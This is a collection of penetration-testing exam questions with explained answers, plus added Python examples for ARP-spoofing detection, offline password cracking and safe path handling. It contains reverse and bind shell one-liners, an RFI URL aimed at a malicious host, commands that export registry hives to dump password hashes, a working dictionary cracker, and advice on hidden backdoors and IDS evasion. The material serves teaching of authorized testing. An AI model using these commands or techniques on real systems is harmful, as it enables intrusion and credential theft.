A) Veil #Veil (Veil-Evasion, now part of the Veil framework) is a tool that generates Metasploit-compatible payloads wrapped in a variety of languages and encodings specifically to evade antivirus and other security controls. #W3AF is a web application attack and audit framework and Nikto is a web server vulnerability scanner; neither is designed for evasion. #Tor (The Onion Router) allows the user to browse the internet anonymously. It does this by routing IP traffic through an expansive network of Tor relays, changing the route regularly. This obscures the user's location and makes it extremely difficult to trace traffic back to the user, but it does nothing against antivirus.

A web application is finally finished. The developer wants to test the code of the application for errors and weaknesses before it goes out to a full Q/A. Which of the following scan processes should the software developer perform? (Choose two.) A) Vulnerability B) Static C) Compliance D) Dynamic

A) Vulnerability D) Dynamic #The software developer should perform a dynamic vulnerability scan. Dynamic scans are performed while the software is running, preferably in a sandbox or non-production environment, and do not have back-end access to the code. #Static analysis is what the name implies, investigating something when it is not up and running. NOTE: Compliance scans, by their very nature, are only interested in whatever compliance rules your company needs to follow. For instance, if you are a hospital or medical clinic, you need to be in compliance with HIPAA. In this scenario, the developer should perform an overall vulnerability/dynamic scanning of this web app for errors and weaknesses.

Which of the following types of pen test would be most appropriate for assessing the potential of an internal attack? A) White box B) Red box C) Gray box D) Black box

A) White box #In a white-box assessment, the testers are given as much information about the network as an employee would have (network diagrams, configurations, and sometimes source code and credentials). This knowledge helps the tester assess the potential for an insider attack. #In a black-box assessment, the tester is given NO information about the network. This type of pen test assesses the potential for an external attack. #In a gray-box assessment, the tester is given some information about the existing network, but not all. A gray-box assessment includes more background information than a black-box test but less than a white-box test. NOTE: "Red box" is not a type of penetration test; it is a distractor.

As a pen tester, covering your tracks is as important, maybe more, than lateral movement in the post-exploitation process. Which of the following should you NOT do to cover your tracks? A) You should infect most of the hosts on the company's network to hide your movement. B) You should vary your malware on the network. C) You should use a VPN to facilitate bypassing some network monitoring. D) You should secretly deploy backdoors.

A) You should infect most of the hosts on the company's network to hide your movement. #Infecting most hosts does the opposite of hiding you: the more systems you touch, the more artifacts, alerts, and log entries you create, so your presence ends up out in the open. If you only infect a few hosts and keep them updated, the intrusion detection systems (IDSs) may not detect your presence, and it will be harder for incident response to deal with. The other options (varying your malware so that one signature does not expose every foothold, using a VPN or encrypted tunnel to bypass some network monitoring, and quietly deploying backdoors for persistence) are all track-covering techniques, provided the rules of engagement allow them and everything is removed during post-engagement cleanup.

Which of the following entities would most likely require an attestation of findings after the completion of a penetration test? (Choose all that apply.) A) federal, state, or local government B) partner C) competitor D) regulatory agency

A) federal, state, or local government B) partner D) regulatory agency #Partner contracts may contain stipulations regarding security and penetration testing. As a result, an organization may need an attestation of findings to show compliance. #Federal, state, or local government regulations or regulatory agencies may require an organization to provide (or keep on hand) an attestation of findings to prove compliance. A competitor has no standing to demand one.

You have been hired to conduct a pentest of an organization. What would be a correct way to scan the HTTP port of the given host using the most aggressive timing template? A) nmap -p80 -T5 10.10.10.10/24 B) nmap -sS443 -T5 10.10.10.10/24 C) nmap -sS80 -T0 10.10.10.10/24 D) nmap -p 443 -T1 10.10.10.10/24

A) nmap -p80 -T5 10.10.10.10/24 #The command nmap -p80 -T5 10.10.10.10/24 is the correct way to select the HTTP port (80) in an Nmap scan of the /24 range; -p 80 with a space is equivalent. The options with -sS443 and -sS80 are invalid because -sS (SYN scan) takes no port argument, and 443 is HTTPS rather than HTTP. The parameter -T5 is the most aggressive timing template. Timing templates are specified with the -T option and range from 0 through 5. The parameter -T0 takes the longest time to scan a network and is far less likely to set off IDS alerts because of the slow rate of packets. The parameter -T5 is much quicker but is very likely to set off IDS alerts.

You are reviewing the command shells from the following target and attacker systems:
172.18.60.249 - Laptop running Kali Linux
172.18.60.251 - Desktop running Windows 7
172.18.60.252 - Server running BlackArch Linux
Which of the following commands/outputs demonstrate a successful bind shell? (Choose all that apply.)
A)
root@kali:~# nc 172.18.60.251 4444
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Jack Pawned>
B)
root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
connect to [172.18.60.249] from win7.home.net [172.18.60.251] 49435
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Jack Pawned>
C)
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Jack Pawned> nc.exe -lvp 4444 -e cmd.exe
listening on [any] 4444 ...
connect to [172.18.60.251] from kali.home.net [172.18.60.249] 44348
D)
[root@blackarch ~]# bash -i >& /dev/tcp/172.18.60.249/4444 0>&1
E)
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Jack Pawned> nc.exe 172.18.60.249 4444 -e cmd.exe
F)
root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
connect to [172.18.60.249] from blackarch.home.net [172.18.60.252] 44612
[root@blackarch ~]#

A) root@kali:~# nc 172.18.60.251 4444 followed by the Windows prompt: the Kali attacker connects to a listener on the Windows target and receives its command prompt.
C) C:\Users\Jack Pawned> nc.exe -lvp 4444 -e cmd.exe followed by "connect to ... from kali.home.net": the Windows target is listening and hands cmd.exe to whoever connects, and the connection shown comes in from Kali.
NOTE: In a bind shell the target listens and the attacker connects in. The remaining outputs depict reverse shells, not bind shells: in B and F the Kali attacker is the listener (nc -lvp 4444) and receives a shell pushed to it from the Windows and BlackArch targets; in E the Windows target connects out to the attacker with -e cmd.exe; and in D the BlackArch target connects out with bash -i >& /dev/tcp/172.18.60.249/4444 0>&1, which attaches an interactive bash to a TCP connection using bash's /dev/tcp pseudo-device. In a reverse shell the network service listens on the attacker host, the target connects out and passes the shell to the attacker, and the attacker then executes shell commands remotely on the target. Reverse shells are usually preferred in practice because outbound connections pass through the firewalls and NAT that would block an inbound connection to a bind shell.

Your company has requested that a retest be carried out within weeks of receiving a penetration test report from a contractor. What is the best reason for doing this? A) to verify that identified vulnerabilities have been mitigated B) to reprioritize the goals of the penetration test C) to discover if a prior compromise has occurred D) to determine if the results were valid

A) to verify that identified vulnerabilities have been mitigated #A company would request that a retest be carried out within weeks of a penetration test report to verify that identified vulnerabilities have been mitigated. Retesting is a vital follow-up action to ensure that the findings of the penetration test have been addressed. #The best way to determine if the results were valid is to research the conditions of your enterprise as compared with the penetration test. Valid findings would be corroborated by your research. #If a prior compromise has occurred, the tester should have noted that in the report. In addition, the company should have been notified that a compromise was detected at the time that the compromise was discovered.

ARP spoofing attack.

ARP spoofing involves sending gratuitous ARP replies (replies nobody requested; hosts process them anyway and update their ARP caches). The forged reply maps a victim's IP address to the attacker's MAC address, so traffic destined for that IP is delivered to the attacker instead. For the best effect, the attacker claims the IP address of the victims' router or gateway, so all traffic leaving the network passes through the attacker rather than going straight to the gateway (the attacker forwards it on so the victims notice nothing). Defences include dynamic ARP inspection on switches, static ARP entries for critical hosts, and monitoring for IP-to-MAC binding changes.
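Detection follows directly from the description: an IP address that was bound to one MAC suddenly being claimed by another, usually in a reply nobody asked for. The following added example (not from the original page) implements that check over a constructed ARP frame log; the subnet, gateway, victim and attacker addresses are all made up for the demo.

```python
"""Detect ARP spoofing from observed ARP frames. Constructed frame log."""
from dataclasses import dataclass

ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"
GATEWAY_IP = "192.168.1.1"          # assumed gateway of the monitored subnet
GATEWAY_MAC = "aa:bb:cc:00:00:01"   # assumed legitimate gateway MAC
VICTIM_IP, VICTIM_MAC = "192.168.1.10", "aa:bb:cc:00:00:10"
ATTACKER_MAC = "de:ad:be:ef:00:01"  # assumed attacker MAC


@dataclass(frozen=True)
class ArpFrame:
    ts: float
    opcode: int
    sender_ip: str
    sender_mac: str
    target_ip: str
    target_mac: str


def detect_arp_spoofing(frames, watch_ips=(GATEWAY_IP,)):
    """Learn IP->MAC bindings from the sender fields of every ARP frame (hosts
    do the same) and alert when an IP is later claimed by a different MAC.
    A reply that no request asked for is how the attack is delivered, so it is
    recorded and, for watched addresses such as the gateway, rated high."""
    bindings = {}        # ip -> mac currently believed
    outstanding = set()  # IPs someone asked "who-has" for, not yet answered
    alerts = []
    for f in sorted(frames, key=lambda x: x.ts):
        if f.opcode not in (ARP_REQUEST, ARP_REPLY) or f.sender_ip == "0.0.0.0":
            continue     # skip other opcodes and probes that carry no sender IP
        if f.opcode == ARP_REQUEST:
            outstanding.add(f.target_ip)
            unsolicited = False
        else:
            unsolicited = f.sender_ip not in outstanding
            outstanding.discard(f.sender_ip)
        gratuitous = f.opcode == ARP_REPLY and (
            f.sender_ip == f.target_ip or f.target_mac == BROADCAST)
        known = bindings.setdefault(f.sender_ip, f.sender_mac)
        if known != f.sender_mac:
            alerts.append({
                "ts": f.ts, "ip": f.sender_ip,
                "old_mac": known, "new_mac": f.sender_mac,
                "unsolicited": unsolicited, "gratuitous": gratuitous,
                "severity": "high" if f.sender_ip in watch_ips and unsolicited else "medium",
            })
            bindings[f.sender_ip] = f.sender_mac  # follow the change so flip-flops show too
    return alerts


# Constructed frame log: one normal exchange, then the attacker poisons both sides.
SAMPLE_FRAMES = [
    ArpFrame(0.00, ARP_REQUEST, VICTIM_IP, VICTIM_MAC, GATEWAY_IP, "00:00:00:00:00:00"),
    ArpFrame(0.01, ARP_REPLY, GATEWAY_IP, GATEWAY_MAC, VICTIM_IP, VICTIM_MAC),
    ArpFrame(5.00, ARP_REPLY, GATEWAY_IP, ATTACKER_MAC, GATEWAY_IP, BROADCAST),  # "I am the gateway"
    ArpFrame(5.01, ARP_REPLY, VICTIM_IP, ATTACKER_MAC, VICTIM_IP, BROADCAST),    # "I am the victim"
]

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_FRAMES):
        print(alert)
```

Legitimate events also change bindings (DHCP handing an address to a new host, a replaced NIC, VRRP/HSRP gateway failover), so in production the alert should be correlated with DHCP lease data and the switch's own ARP inspection logs before anyone is accused of anything.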

Unauthenticated scan vs. authenticated scan

An unauthenticated scan reviews your hosts for vulnerabilities from the outside, without valid credentials, so it sees only what an anonymous attacker would see. It is not, in and of itself, an Nmap option, but a description of how and when you are running a scan. An authenticated (credentialed) scan logs in to the asset and inspects installed software, patch levels, configuration files and local accounts directly; it finds issues an unauthenticated scan cannot reach and produces fewer false positives, at the cost of needing credentials and access to be arranged.

You have been tasked with scanning a network for all of the devices connected to that network. Because Nmap uses host discovery to detect and further probe only the active devices, you want to skip the host discovery phase as a whole. Which Nmap command option disables host discovery? A) -p B) -Pn C) -sn D) -sT

B) -Pn #-Pn disables host discovery: Nmap treats every address in the range as up and goes straight to port scanning, so hosts that drop ICMP and the other discovery probes are not silently skipped. Expect a slower scan, since unused addresses are probed too. #-p specifies the ports to scan. #-sn is a ping (host discovery only) scan with no port scan, the opposite of what is asked; the capitalised -sN is a different option, the TCP Null scan. #-sT performs a TCP connect scan.

You are designing a pen test in which you want to see if you can successfully send unsolicited text messages to company smartphones and laptops. What type of attack are you simulating? A) WPS implementation weakness B) Bluejacking C) RFID cloning D) Jamming

B) Bluejacking #You are testing the likelihood that a Bluejacking attack will succeed. Bluejacking uses Bluetooth's OBEX push feature to send unsolicited messages (vCards or notes that appear as text) to nearby devices that have Bluetooth enabled and left in discoverable mode. It is a nuisance rather than data theft; Bluesnarfing is the related attack that pulls data off the device. WPS weaknesses, RFID cloning and jamming concern Wi-Fi, access cards and radio interference respectively, not messaging.

During the first stage of a penetration test, you discover a possible critical vulnerability. You immediately communicate with certain project stakeholders regarding this vulnerability. However, during the second stage, you discover that the severity of this vulnerability decreases based on new findings. Which of the following should you report? A) Indication of compromise B) De-escalation C) Critical finding D) De-confliction

B) De-escalation #You should report a de-escalation of the vulnerability. Often vulnerabilities that are discovered will be de-escalated based on other findings. If a previously reported critical vulnerability is found to be no longer critical, you should report this new finding to the stakeholders.

Your goal is to crack a password that is encrypted in the ciphertext format. Which of the following would you use if you wished to crack the password offline? A) Medusa B) John the Ripper C) Hydra D) Mimikatz

B) John the Ripper #Stored passwords are hashes, not reversible ciphertext; John the Ripper is an extremely popular offline cracker that takes captured hashes in many formats and tests candidate passwords from wordlists, mangling rules and incremental (brute-force) search until a computed hash matches. Medusa and Hydra are online brute forcers that submit guesses to a live service; Mimikatz extracts credentials and hashes from Windows memory rather than cracking them.
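The mechanics of offline cracking are simple enough to show in full. The following added example (not from the original card) runs a dictionary attack with a small set of mangling rules against salted SHA-256 hashes in a user:salt:hash format. Both the format and the dump are assumptions constructed inside the code, so the plaintexts are known only because the script generated the hashes itself; John's rule language is far richer, but this is the loop it runs.

```python
"""Offline dictionary attack with mangling rules. Constructed dump and wordlist."""
import hashlib
import itertools

WORDLIST = ["password", "summer", "welcome", "dragon", "letmein"]  # constructed
YEARS = [str(y) for y in range(2015, 2026)]


def hash_password(salt: str, password: str) -> str:
    # Assumed storage format: hex(sha256(salt || password)). Fast hashes like
    # this are exactly why offline cracking is cheap; real systems should use a
    # purpose-built slow hash (bcrypt, scrypt, Argon2). NT hashes would instead
    # need MD4 over the UTF-16LE password, which hashlib may not ship by default.
    return hashlib.sha256((salt + password).encode()).hexdigest()


def mangle(word: str):
    """Yield candidates derived from one wordlist entry: case changes, common
    suffixes and years, roughly the rules a cracker applies to each word."""
    for base in (word, word.capitalize(), word.upper()):
        yield base
        for suffix in ("1", "123", "!", "1!"):
            yield base + suffix
        for year in YEARS:
            yield base + year
            yield base + year + "!"


def crack(records, wordlist=WORDLIST):
    """records: iterable of 'user:salt:hash' lines. Returns {user: password or None}.
    Because each record has its own salt, every candidate must be rehashed per
    user; that per-record cost is the whole point of salting."""
    candidates = list(dict.fromkeys(
        itertools.chain.from_iterable(mangle(w) for w in wordlist)))
    results = {}
    for line in records:
        user, salt, digest = line.strip().split(":")
        results[user] = None
        for cand in candidates:
            if hash_password(salt, cand) == digest:
                results[user] = cand
                break
    return results


# Constructed dump: the plaintexts are known only because we generate them here.
SAMPLE_DUMP = [
    f"alice:3f9a:{hash_password('3f9a', 'password')}",
    f"bob:77c1:{hash_password('77c1', 'Summer2021')}",
    f"carol:0be2:{hash_password('0be2', 'Welcome!')}",
    f"dave:aa10:{hash_password('aa10', 'Tr0ub4dor&3')}",  # not derivable from the wordlist
]

if __name__ == "__main__":
    for user, pw in crack(SAMPLE_DUMP).items():
        print(f"{user}: {pw if pw else '<not cracked>'}")
```

The equivalent John invocation is a wordlist run with rules enabled against the dump file; the uncracked entry shows what a password outside the rule space buys the defender.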

Which of the following is an open-source fuzzer created by Cisco? A) AFL B) Mutiny Fuzzing Network C) Peach D) Recon-ng

B) Mutiny Fuzzing Network #The Mutiny Fuzzing Framework is an open-source network fuzzer released by Cisco. It replays captured traffic (pcaps) through a mutational fuzzer, so little protocol knowledge is needed to get started. #AFL (American Fuzzy Lop) is a coverage-guided file-input fuzzer and not a Cisco project; Peach is a generation and mutation fuzzing framework from Peach Tech; Recon-ng ships with Kali Linux and automates the gathering of Open Source Intelligence (OSINT), and is not a fuzzer at all.

What tool was primarily designed to brute force both directory and file names on web application servers? A) Nessus B) OWASP ZAP C) W3AF D) Nikto

B) OWASP ZAP #DirBuster was the tool originally designed to brute force both directory and file names on web application servers. It is now an inactive project whose functionality (and wordlists) has been integrated into OWASP ZAP as the Forced Browse feature. Nikto scans web servers for known dangerous files and misconfigurations; W3AF is a web application attack and audit framework; Nessus is a general vulnerability scanner.

While attacking InterConn's network, you see an attack vector against their server using the following address: http://example.interconn.com/example.php?file=http://www.malicious-example.com/malicious.php What attack is being used here? A) SQL injection B) RFI C) Directory traversal D) XSS

B) RFI #Remote file inclusion (RFI) is being used here: the file parameter is passed unsanitized to a PHP include or require statement, and because the server allows URLs in include paths (allow_url_include) it fetches http://www.malicious-example.com/malicious.php and executes it, typically giving the attacker a web shell. RFI was more common several years ago, and modern PHP ships with allow_url_include off by default, but applications that build include paths from user input remain vulnerable to local file inclusion and traversal. The fix is never to build a path from the parameter at all: map it to an allow-list of known pages. (PHP: Hypertext Preprocessor is a general-purpose scripting language embedded in HTML to build web sites.)

The client has developed a payment schedule for a pen test that makes the largest payment at the time of the report delivery. Where is this information recorded? A) NDA B) SOW C) MSA D) Rules of engagement

B) SOW #The statement of work (SOW) defines a number of details concerning a pen test. They include: Timelines, including the report delivery schedule; Scope of the work to be performed; Location of the work (geographic location or network location); Technical and nontechnical requirements; Cost of the penetration tests; Payment schedule

To perform network reconnaissance, you use Nmap to perform a SYN scan. After completing this scan, you want to create more custom packets and gain more control over the traffic you are sending. Which tool should you use to do this? A) DNSrecon B) Scapy C) Recon-ng D) Metasploit

B) Scapy #Scapy is a Python-based packet crafting tool, usable interactively or as a library, that lets users build, modify, send and capture packets layer by layer, giving far more control over the traffic than Nmap's fixed probes. DNSrecon and Recon-ng are reconnaissance tools and Metasploit is an exploitation framework; none is designed for arbitrary packet crafting.

During the penetration testing planning session, the organization has decided to use CVSS scores to help determine the criticality of any discovered vulnerabilities. Which one of these CVSS groups does NOT receive a score in the CVSS system? A) Temporal B) Security C) Base D) Environmental

B) Security #An overall Common Vulnerability Scoring System (CVSS) score is generated using three group scores: 1) Base group: represents characteristics of a vulnerability that are constant over time and do not depend on the environment. 2) Temporal group: assesses a vulnerability as it changes over time. 3) Environmental group: represents the characteristics of a vulnerability, taking into account the organizational environment. There is no Security group in the CVSS system.

Which of the following is MOST likely to be affected by the Wassenaar Arrangement? A) The permitted time periods in which pen testing can occur B) The tools that can be used to perform the pen test C) The permitted locations for pen testing to occur D) The identity of the individuals who can perform the pen test

B) The tools that can be used to perform the pen test #The Wassenaar Arrangement was established for export control of conventional arms and dual-use (civilian/military) goods and technologies. Some of the tools used in pen testing might incorporate technologies that may not be allowed to be used in the country where the organization undergoing the test is headquartered or located. NOTE: These types of export restrictions cover technologies and products and do not address issues such as the identity of the tester, the permitted locations, or time periods.

Which of the following is a social engineering attack that can be mitigated with card or badge covers? A) piggybacking B) badge cloning C) shoulder surfing D) fence jumping

B) badge cloning #Badge cloning reads an RFID or proximity badge wirelessly, so a shielded badge holder (a card case or sleeve containing a thin layer of metal) defeats it: the metal blocks the reader's field and keeps any reader, legitimate or malicious, from energizing and reading the card while it is sheathed. Piggybacking, shoulder surfing and fence jumping are physical techniques that a badge cover does nothing against.

One of the pen testers was successful in cloning the company's AP, jamming the frequency on which the company's AP operates and causing several clients to associate with the fake AP. The users have a preconfigured WLAN profile that specifies the proper SSID, and for user convenience, also specifies their WLAN credentials. What type of attack is MOST LIKELY being conducted? A) deauthentication attack B) credential harvesting C) KARMA attack D) fragmentation attack

B) credential harvesting #Jamming the AP's operating frequency forces the stations off the legitimate AP. They then do what their saved WLAN profile tells them and look for another AP advertising the same SSID. When they find the cloned AP they try to authenticate to it, and because the profile also stores the credentials, the supplicant presents them automatically (the pre-shared key handshake, or the EAP identity and response for an enterprise network), which the rogue AP captures for offline cracking or relay. #A KARMA attack answers every probe request with whatever SSID the client asks for; here the tester cloned one specific SSID, so credential harvesting is the better fit. #A wireless fragmentation attack recovers pseudo-random generation algorithm (PRGA) keystream from a WEP network and does not involve a fake AP. NOTE: A deauthentication attack is a form of denial of service that could also knock clients off the AP, but it describes the disconnection step, not the goal of this attack.

During the planning for a penetration test, one of the organizational security team members described an attack that occurred recently. In that attack, the attackers forced a system to use a less secure version of TLS that led to the cracking of an encryption key. The team member would like the pen testers to assess the likelihood that it could occur successfully again. What attack do the testers need to simulate? A) jamming B) downgrade C) repeating D) Bluesnarfing

B) downgrade #The pen testers need to simulate a downgrade attack. This attack forces a system to negotiate a weaker protocol version or cipher suite, one that makes it easier to recover the key or the plaintext. The Padding Oracle On Downgraded Legacy Encryption (POODLE) attack is the classic example: the attacker forces the handshake down to SSL 3.0 and then exploits its CBC padding handling to recover plaintext such as session cookies. It was a protocol weakness exploited through downgrade, not a bug in one particular library; the mitigation is to disable the legacy versions outright and support TLS_FALLBACK_SCSV so a forced fallback is detected.

You performed a pen test for a retail organization that processes credit card information. During the test you identified several sensitive credit card items were stored with other data that was widely available to users. What concept required by PCI-DSS would rectify this situation? A) intrusion prevention systems B) network segmentation C) next generation firewalls D) key management

B) network segmentation #PCI DSS applies to the cardholder data environment (CDE). Segmenting the CDE from the rest of the network keeps card data off systems that general users can reach and shrinks the assessment scope, which is exactly what the finding calls for. In general, when dealing with any compliance-based pen test, the penetration tester should verify the presence of the following best practices: data isolation (segmentation of regulated data); secure key management; proper password policies.

You are evaluating whether a Windows server is vulnerable to a pass-the-hash attack. You need to retrieve system account password hashes, such as the following output: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Which command-line statement should you run? A) lsadump SYSTEM.10.201.42.149 SECURITY.10.201.42.149 B) pwdump SYSTEM.10.201.42.149 SAM.10.201.42.149 C) reg.exe save HKLM\SAM SAM.10.201.42.149 D) reg.exe save HKLM\SYSTEM SYSTEM.10.201.42.149 E) reg.exe save HKLM\SECURITY SECURITY.10.201.42.149 F) pwdump SYSTEM.10.201.42.149 SECURITY.10.201.42.149

B) pwdump SYSTEM.10.201.42.149 SAM.10.201.42.149 #pwdump (from the creddump suite) reads the SYSTEM hive for the boot key and the SAM hive for the account data, and prints the LAN Manager (LM) and NT hashes in the user:RID:LM:NT::: format shown in the scenario. In the sample line, aad3b435b51404eeaad3b435b51404ee is the placeholder for "no LM hash stored" and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password. In a pass-the-hash attack you do not crack the hash at all: the NT hash is reused directly for NTLM authentication, because the protocol only needs the hash, not the plaintext. NOTE: reg.exe save does not output hashes, but you run it first on the target Windows server to export the hives that creddump needs (reg.exe save HKLM\SAM SAM.10.201.42.149, and likewise SYSTEM and SECURITY) into offline files. lsadump outputs the Local Security Authority (LSA) secrets rather than account hashes; it is typically used to retrieve the NL$KM value, the key that encrypts cached domain credentials.

Covering your tracks as a pen-tester

By: 1) deploying backdoors that give you persistence on some of the hosts, so you do not have to re-exploit your way back into the network. Keep them hidden or encrypted, and record every one so it can be removed at the end of the test. 2) varying your tooling across the network. A massive dump of the same implant with the same signature will set off enterprise alerts; a few varied payloads on different systems are harder for incident response to correlate. 3) routing through a VPN or proxy chain to bypass some network monitoring and, above all, to hide your source IP address so activity is not immediately attributed to you. Everything deployed for these purposes must fall within the rules of engagement and be cleaned up when the engagement ends.

A pen tester is discussing an upcoming pen test with the client. The client is explaining which systems are off limits to the penetration test. Where should these details be recorded? A) SOW B) MSA C) Rules of engagement D) Bilateral NDA

C) Rules of engagement #The rules of engagement (RoE) document specifies the targets and systems that should be excluded from the pen test. With this in mind, this lines up more with what the client is explaining to the penetration tester.

A user in your company visits a website that asks if they want a monthly newsletter emailed to them. They think they click the link that says http://www.funideasmonthly.com, but they actually click a malicious hyperlink, http://www.funmalwaremonthly.com. What is this attack called? (Choose all that apply.) A) Juice jacking B) Cryptojacking C) Clickjacking D) Link jacking E) UI redressing

C) Clickjacking E) UI redressing #This is called clickjacking, also known as UI redressing. It comes down to a transparent layer over the visible page, typically an invisible iframe positioned over the content, so that when you think you are clicking the newsletter link you are actually clicking a hidden element above it. It is sneaky, and the fix lies with the site rather than the user: a site that does not send framing protection headers (Content-Security-Policy: frame-ancestors, or the older X-Frame-Options) can be framed by any page, and neither your browser nor your company's security controls can fully compensate. Always hover your mouse over a link and examine the actual hyperlink behind it.

During the execution of a pen test, several users report that they are arriving at the company intranet website to find a banner that says: Please report this site to your admin! It's a fake! Which attack type has the pen tester carried out? A) ARP spoofing B) Pass the hash C) DNS cache poisoning D) Man-in-the-middle

C) DNS cache poisoning #The pen tester has inserted false records into the cache of the DNS server the users rely on, so lookups for the intranet name return the address of a host the tester controls, which serves the banner page. Attackers use the same cache pollution to direct users to malicious websites where they may pick up malware or expose credentials. #Cache poisoning works by injecting forged responses that the resolver accepts and caches (or by altering records on a compromised authoritative server); nslookup only queries DNS and cannot change records. The advantage to the attacker is that polluting the shared resolver affects EVERY user of that DNS server, whereas ARP spoofing or a man-in-the-middle position reaches only the segment the attacker sits on.

On a penetration test of your client's site, you see a shopping catalog. Upon looking at the pictures of the items in their catalog, you find the address of where the images are located in the web application: /var/coats/images/218.png. You put that address in your browser's URL as https://insecure-website.com/var/coats/images/218.png. The image of a coat shows up by itself. You take that image and play with the address to easily allow a certain type of attack to happen. There is no security against this attack in place. What is this attack called? A) File inclusion B) Cookie manipulation C) Directory traversal D) Malicious file upload

C) Directory traversal #This attack is a directory traversal. It is a very common attack against sites and an easy way to get around login pages or reach private galleries, files, or even username and e-mail lists. Frequently the attack requires guessing which subdirectory and/or filename is your target; with some detective work, you can follow the normal file and domain structures that sites use. You can perform it in two ways: the relative method, chaining ../ sequences (often URL-encoded as %2e%2e%2f) to climb out of the images directory, or by typing in an absolute path (https://interconn.com/wp-content/uploads/2018/03) to reach a directory listing or a file the application never meant to serve. #File inclusion is the related case where the path is fed to an include statement and executed rather than served; here the server merely returns files, so traversal is the right label.
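Both this traversal scenario and the RFI card above (the file=http://... parameter) come down to one server-side mistake: building a filesystem or include path out of user input. The following added example (not from the original page) shows the hardened form in Python: a resolver that confines catalog image paths to their root and refuses URLs, absolute paths, NUL bytes and climbing, plus an allow-list lookup for include parameters. The image root and page names are assumptions for the demo.

```python
"""Safe resolution of user-supplied file parameters (anti-traversal, anti-RFI)."""
import posixpath
from urllib.parse import unquote, urlsplit

IMAGE_ROOT = "/var/coats/images"         # assumed web-served image directory
PAGES = {"home": "pages/home.php",       # assumed allow-list for ?file= includes
         "about": "pages/about.php"}


def resolve_image(user_path: str):
    """Map a relative image path under IMAGE_ROOT. Returns None for anything
    that is a URL, absolute, contains a NUL, or would escape the root."""
    path = unquote(user_path)                   # one decode, as the web server would do
    if "\x00" in path or urlsplit(path).scheme:
        return None                             # NUL truncation tricks and RFI-style URLs
    path = path.replace("\\", "/")              # treat Windows separators like '/'
    if path.startswith("/"):
        return None                             # absolute paths are never catalog images
    norm = posixpath.normpath(path)             # collapses a/../b, ./x, doubled slashes
    if norm in (".", "..") or norm.startswith("../"):
        return None                             # empty target, or climbs above the root
    candidate = posixpath.join(IMAGE_ROOT, norm)
    # belt and braces: the joined path must still live under the root
    if posixpath.commonpath([IMAGE_ROOT, candidate]) != IMAGE_ROOT:
        return None
    return candidate


def resolve_include(page: str):
    """Allow-list lookup for include parameters: the user chooses a key, never
    a path, so neither ../ nor http:// can ever reach include()."""
    return PAGES.get(page)


if __name__ == "__main__":
    for p in ["218.png", "winter/../219.png", "../../etc/passwd",
              "..%2F..%2Fetc%2Fpasswd", "/etc/passwd",
              "http://www.malicious-example.com/malicious.php", "218.png%00.jpg"]:
        print(f"{p!r:50} -> {resolve_image(p)}")
    print(resolve_include("home"), resolve_include("http://www.malicious-example.com/malicious.php"))
```

Decoding exactly once matters: a double-encoded %252F stays a literal %2F after one pass and simply fails to match a file, which is safe as long as nothing downstream decodes it a second time.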

Which of the following is NOT likely to be carried out after a penetration test is completed? A) Remove shells created during the test. B) Remove the tools installed during the test. C) Disable all services used during the test. D) Remove accounts created for the test.

C) Disable all services used during the test. #Disabling all services used during the test is NOT likely to be carried out after a penetration test is completed. You should only disable those services that were explicitly enabled for the penetration test. All other services will likely be valid services running in the enterprise. You should perform the following actions after completing a penetration test: Remove shells created during the test. Remove accounts created for the test. Remove the tools installed during the test.

A security analyst was provided with a detailed penetration report of a pen test performed against the organization's resources located in its secure operations center. It was noted on the report that a vulnerability on a server has a CVSS base score of 10.0. However, after performing further research, the security analyst notes that the AV measurement is P. What should the security analyst do to address the vulnerability? A) Ensure that communication over the entire internal network with the server is encrypted. B) Ensure that both internal and external communication with the server is encrypted. C) Ensure that the secure operations center has the appropriate physical controls to prevent access to the server. D) Ensure that communication on the local network with the server is encrypted.

C) Ensure that the secure operations center has the appropriate physical controls to prevent access to the server. #An Attack Vector (AV) value of P means the vulnerability can only be exploited by an attacker who physically touches or manipulates the host, so the controlling mitigation is physical access control to the server, not encryption of network traffic. Encrypting communication on the local network or the whole network does nothing against someone standing at the console. NOTE: In CVSS 3.x a vector with AV:P cannot produce a base score of 10.0 (the highest it can reach is 7.6), so the analyst's reading of the vector and the report's headline score cannot both be correct; re-derive the score from the full vector and raise the discrepancy with the testers.

A penetration tester has been hired to perform a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five of them identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Which of the following would be the BEST suggestion for the client? A) Identify the issues that can be remediated most quickly and address them first. B) Implement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities C) Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time. D) Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.

C) Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time. #The client should fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time. Correcting the most critical vulnerability would prevent an attacker from remotely compromising a system easily and possibly obtaining full control.

A penetration tester reports that several servers have ports 20 and 21 open. These servers do not have any communication that should occur over those ports. You need to ensure that attacks cannot be carried out over these ports on those servers. What should you do? A) Harden the servers by disabling SMTP and its ports. B) Encrypt all communication over those ports. C) Harden the servers by disabling FTP and its ports. D) Implement a rule on the firewall to prevent communication over those ports.

C) Harden the servers by disabling FTP and its ports. #Ports 20 and 21 are FTP (data and control). Hardening a server means disabling unnecessary services and the ports they listen on, so that only valid, needed communication is possible. NOTE: A firewall rule alone is the wrong answer here. It only filters traffic that passes through the firewall, not connections from hosts on the same segment, and a broad rule could interrupt legitimate FTP communication elsewhere in the network rather than just connections to these servers. Encrypting the traffic does not remove an unneeded service, and SMTP uses port 25, not 20 and 21.

